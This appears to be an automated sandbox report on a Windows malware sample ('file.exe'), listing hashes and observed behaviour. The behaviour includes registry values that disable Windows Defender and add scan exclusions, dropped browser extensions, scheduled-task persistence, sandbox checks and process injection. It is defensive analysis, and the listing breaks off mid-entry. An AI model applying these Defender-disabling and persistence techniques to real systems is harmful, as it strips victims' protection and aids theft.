Analysis
-
max time kernel
132s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
27-09-2022 18:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
3b3d09345ad44e2122a5ddef64ef6abb
-
SHA1
ea3654ef2630810c967e05636abdca02c14b5bee
-
SHA256
6827de64c5c907041f2795b5c7db324a68ff3a44bb7c6ea9828e9ac47cb54161
-
SHA512
d9b4b0632aa0df6e4758747b6497c2a32749cfb4c0492fd9d7e87280e10071dcc316398033d48ca483088c04f905c6389e67a9d1adbc9be09d2c00dcd962a1bb
-
SSDEEP
196608:91O0mSOPS1loo2HeWnKcHvvMkbKHpEBD5wN+g4X28:3OzPSUo2BHvkkbK+BD5w0g49
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HCxyEYsLPoBU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WrbOaSOTQfUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BsYOAUalmtuIFlVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jNivjIkKU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VYxEjiIKDDwYC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VYxEjiIKDDwYC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WrbOaSOTQfUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR = "0" conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SVXwGszHTIpIGNNH = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HCxyEYsLPoBU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SVXwGszHTIpIGNNH = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SVXwGszHTIpIGNNH = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\SVXwGszHTIpIGNNH = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jNivjIkKU = "0" conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths conhost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\BsYOAUalmtuIFlVB = "0" reg.exe -
Blocklisted process makes network request 6 IoCs
flow pid Process 30 760 rundll32.exe 31 760 rundll32.exe 32 760 rundll32.exe 33 760 rundll32.exe 34 760 rundll32.exe 36 760 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1536 Install.exe 764 Install.exe 976 rBmOUbp.exe 792 rSagEer.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Control Panel\International\Geo\Nation rSagEer.exe -
Loads dropped DLL 12 IoCs
pid Process 1456 file.exe 1536 Install.exe 1536 Install.exe 1536 Install.exe 1536 Install.exe 764 Install.exe 764 Install.exe 764 Install.exe 760 rundll32.exe 760 rundll32.exe 760 rundll32.exe 760 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json rSagEer.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json rSagEer.exe -
Drops file in System32 directory 23 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 rSagEer.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 rSagEer.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rBmOUbp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 rSagEer.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rBmOUbp.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol rBmOUbp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 rSagEer.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 rSagEer.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA rSagEer.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\jNivjIkKU\aXcLiiZ.xml rSagEer.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\tMKorFT.dll rSagEer.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\mWqvbEB.xml rSagEer.exe File created C:\Program Files (x86)\WrbOaSOTQfUn\PDcyMTt.dll rSagEer.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja rSagEer.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\tzqwSRuSihCCE.dll rSagEer.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\vFafJzw.xml rSagEer.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\RbgOMWf.dll rSagEer.exe File created C:\Program Files (x86)\jNivjIkKU\zwRShC.dll rSagEer.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi rSagEer.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi rSagEer.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak rSagEer.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\uDQIoUi.xml rSagEer.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ydofTeYvCFRiBkl.job schtasks.exe File created C:\Windows\Tasks\BTdQtQCLlbasEjBtK.job schtasks.exe File created C:\Windows\Tasks\bGKvUxYEKJhmpNiCsB.job schtasks.exe File created C:\Windows\Tasks\GyQsokuHCPHrPIKjm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1616 schtasks.exe 888 schtasks.exe 1112 schtasks.exe 1884 schtasks.exe 652 schtasks.exe 1712 schtasks.exe 1488 schtasks.exe 1544 schtasks.exe 1204 schtasks.exe 1956 schtasks.exe 948 schtasks.exe 1364 schtasks.exe 1660 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates rSagEer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rSagEer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f008f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{358FB0CD-3072-4E59-BA35-C944FD83CE3D}\72-8a-7f-29-47-46 rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDecision = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rSagEer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{358FB0CD-3072-4E59-BA35-C944FD83CE3D}\WpadNetworkName = "Network 3" rSagEer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDecisionTime = f0128713b0d2d801 rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{358FB0CD-3072-4E59-BA35-C944FD83CE3D}\72-8a-7f-29-47-46 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46 rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDecisionReason = "1" rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{358FB0CD-3072-4E59-BA35-C944FD83CE3D}\WpadDecision = "0" rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDecision = "0" rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs rSagEer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs rSagEer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-8a-7f-29-47-46\WpadDecisionTime = f0128713b0d2d801 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{358FB0CD-3072-4E59-BA35-C944FD83CE3D} rSagEer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{358FB0CD-3072-4E59-BA35-C944FD83CE3D}\WpadDecisionReason = "1" rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs rSagEer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 rSagEer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde rSagEer.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1364 powershell.EXE 1364 powershell.EXE 1364 powershell.EXE 776 powershell.EXE 776 powershell.EXE 776 powershell.EXE 1956 powershell.EXE 1956 powershell.EXE 1956 powershell.EXE 1160 powershell.EXE 1160 powershell.EXE 1160 powershell.EXE 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe 792 rSagEer.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1364 powershell.EXE Token: SeDebugPrivilege 776 powershell.EXE Token: SeDebugPrivilege 1956 powershell.EXE Token: SeDebugPrivilege 1160 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1456 wrote to memory of 1536 1456 file.exe 26 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 1536 wrote to memory of 764 1536 Install.exe 27 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 652 764 Install.exe 29 PID 764 wrote to memory of 380 764 Install.exe 31 PID 764 wrote to memory of 380 764 Install.exe 31 PID 764 wrote to memory of 380 764 Install.exe 31 PID 764 wrote to memory of 380 764 Install.exe 31 PID 764 wrote to memory of 380 764 Install.exe 31 PID 764 wrote to memory of 380 764 Install.exe 31 PID 764 wrote to memory of 380 764 Install.exe 31 PID 652 wrote to memory of 776 652 forfiles.exe 33 